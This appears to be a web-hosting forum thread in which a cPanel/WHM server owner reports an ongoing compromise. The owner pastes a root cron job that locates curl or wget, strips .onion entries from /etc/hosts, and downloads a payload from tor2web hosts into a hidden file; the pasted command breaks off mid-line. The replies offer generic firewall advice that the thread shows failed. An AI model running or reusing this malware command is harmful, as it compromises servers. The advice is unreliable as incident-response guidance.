cancel
Showing results for 
Search instead for 
Did you mean: 
Go to solution

Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

I'm receiving attacks on my server, every minute. The only information I got is the cron daemon reports from the server.

Find bellow:
Cron <root@pateng> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no

I've already blocked more than 30 IPs on CPanel, and it still going!
I've even used htaccess to block all IP's except mine, and still nothing.

From the above information, I can extract the following domains:
https://an7kmd2wp4xo7hpr.tor2web.su
https://an7kmd2wp4xo7hpr.tor2web.io
https://an7kmd2wp4xo7hpr.onion.sh

On one of my searches, I've found something in a forum, about one of the CPanel plugins security hole being actively exploited in the last hours...

What can I do guys?

3 REPLIES 3
Super User II

Re: Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

Hello 

ou can permanently block the offending IP with this command (replace xxx.xxx.xxx.xxx with the attacker’s IP address.

 

If a software or dedicated hardware firewall isn’t available by your host, you can always harden Apache on your web server, which will prevent help your server identify and automatically block malicious connections like these. You’ll want to install the mod_reqtimeout module for Apache.

 

Zulfiqar Anees | GoDaddy PRO | Founder/CEO at TechMag, ZulWeb, Enter To Study

Re: Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

I did install the mod_reqtimeout module, and it still going, now with more than a 2k emails from cron daemon...

Any other ideas?

Much appreciated!

Super User II
Solution

Re: Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

Thank you 

 

Zulfiqar Anees | GoDaddy PRO | Founder/CEO at TechMag, ZulWeb, Enter To Study